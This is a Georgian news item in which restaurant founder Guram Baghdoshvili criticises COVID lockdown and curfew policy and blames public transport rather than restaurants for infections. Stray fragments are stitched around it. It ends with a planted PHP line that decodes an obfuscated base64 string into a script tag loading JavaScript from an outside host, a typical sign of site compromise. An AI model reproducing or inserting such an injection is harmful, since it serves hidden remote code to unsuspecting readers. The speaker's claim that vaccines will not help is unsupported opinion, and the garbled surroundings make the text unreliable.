celsiusi
ავერსი შნაიდერი
რესტორან „ჩვენის“ დამფუძნებელი გურამ ბაღდოშვილი იმედოვნებს, რომ რადიკალურ ზომებს არ მიიღებს სახელმწიფო და კიდევ ერთხელ არ ჩაკეტავს ქვეყანას. ამის შესახებ ბაღდოშვილმა საინფორმაციო სააგენტო BUSINESS TIME-ს განუცხადა. 
 
“სახელმწიფომ, თუ არ მიიღო ყველაზე სწორი გადაწყვეტილება და არ გადაწია კომენდანტი საათი, ორჯერ, სამჯერ კი არა 15 ჯერ ჩაგვკეტავენ და შესაძლოა, ასჯერაც ჩაგვკეტონ! იმიტომ, რომ მათ ჩვენ ვერ მოვიგერიებთ. ძირითადი, რაც არის ბუდე პანდემიის ეს არის საზოგადოებრივი ტრანსპორტი, ყველა მიდის სახლში საღამოს, ამიტომ ნაკადი იზრდება საზოგადოებრივ ტრანსპორტში და იქ ხდება უკვე ფუტკრის სკა, ერთმანეთს აზის ხალხი”, - განაცხადა ბაღდოშვილმა. 
 
მისივე თქმით, ხელის მიშვერა, ეს პირდაპირი შეურაცხყოფა არის იმ ადამიანების, ვინც ნამდვილად კეთილსინდისიერად მუშაობს და ქმნის ტურიზმს და სახელმწიფო იმიჯს. 
 
“ძალიან არასწორად იქცევიან, შემიძლია პირდაპირ ვუთხრა და დებატებზეც გამოვიდე მათთან, იმიტომ , რომ ის ადგილები რომელსაც გულისხმობენ ისინი, რომ დააკონკრეტონ ეს არის სარესტორნო დარბაზები, სადაც უშუალოდ გავლენიანი ადამიანები იხდიან ქორწილს და დაბადების დღეს ნათლობას და ა. შ.”, - აღნიშნა ბაღდოშვილმა. 
 
მისივე განმარტებით, რესტორნები ამ რეჟიმში ისედაც 20% -ს მუშაობენ თვით გადარჩენისთვის. 
 
“წარმოიდგინეთ ადამიანი რომ კომაშია, წვეთოვანზეა შეერთებული და რომ გამორთო წვეთოვანი, ხომ მოკვდეა? ასეთ მდგომარეობაშია დღეს ბიზნესი, სარესტორნო ბიზნესს ვგულისხმობ, ნუ სასტუმროები კი იცით რა დღეშიცაა.  წარმოიდგინეთ, პარლამენტში ყველას კოვიდი აქვს და ჩემთან რესტორანში 150 კაცი მუშაობს და არცერთს კოვიდი არ აქვს. მითხარით სად არის კოვიდი და საიდან მოდის? სად დადიან? ჩემთან რესტორანში არ დადიან, ჩემი რესტორნიდან არ ააქვთ გადადებული და სადაც დადიან, იქიდეან მოდის ეს პრობლემა. აუცილებელი იცით რა არის? სახელმწიფოს ყავს 35 ათასიანი ჯარი რომელიც უნდა ჩააყენოს რესტორნებში, კაფეებში, აფთიაქებში, სუპერმარკეტენში, მოლებში, ქუჩაში საზოგადოებრივ ტრანსპორტში და გააკონტროლონ და დაიცვან წესები. არაგვაქვს ვაქცინა? გვეშინია სიკვდილიანობის? მაშინ გამოიყენონ ჯარი, ხო ვართ ისედაც საგანგებო ვითარებაში. პოლიცია ვერ აკონტროლებს? გამოიყენონ ჯარი. 10 საათი იყო საღამოს მივდიოდი და 400 მდე მანქანა მოძრაობდა, ყველას საშვი ქონდა? ჯარი გამოიყვანონ დაასაქმონ. ლოგიკა არა ბევრ საკითხში, მე ვამბობ , რომ თუ კომენდატი არ გადაიწევა საქართველო შეიძლება ასჯერ დაიკეტოს. ასე კოვიდს ვერ მოერევიან, იმიტომ რომ ვიცით, რომ ვაქცინა არაა ის იარაღი , რომელიც გადაარჩენს საქართველოს”, - აღნიშნა მან.
 
გურამ ბაღდოშვილის თქმით, პრობლემას ბევრი სხვა ფაქტორი წარმოადგდნს და მერე რესტორნებს ბრალდება.
 
“ საზღვრები ღიაა, წინა კვირას ჩამოვედი კიევიდან, თერმოსკრინინგიც არ ჩამიტარეს, კი , გავიკეთე ტესტი სამი დღე იზოლაციაში ვიყავი, მერე გავიკეთე ისევ ტესტი და ნეგატივი მაქვს, მაგრამ ჩემნაირი შეიძლება იყო 10 კაცი და გაიარა უპრობლემოდ. როგორ, ჩვენ სხვის გამო უნდა დაგვადანაშაულონ? სხვების გამო შეურაცხყოფა მოგვაყენონ? რომ თურმე რესტორნიდან მოდის კოვიდი ?! ვეპატიჟები ქალბატონ მინისტრს, ბატონ გამყრელიძეს და მათ “კანტორას” ჩავიდნენ მეტროში პიკისაათში და ნახონ რას აიკიდებენ, მარტო კოვიდს კი არა შეიძლება სიფილისიც აიკიდონ. მიუღებელი, არასწორი მენეჯმენტია, ეს არის ყველაზე დიდი პრობლემა და მერე რესტორნებს აბრალებენ, ეს არის მიუღებელი. იმასაც გეტყვით შემოწმებაზე დღეგამოშვებით დადიან, როგორც ჩემთან ისე სხვებთან დ ჩვენ რეგულაციებს ვიცავთ”, - დასძინა ბაღდოშვილმა.
2994
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");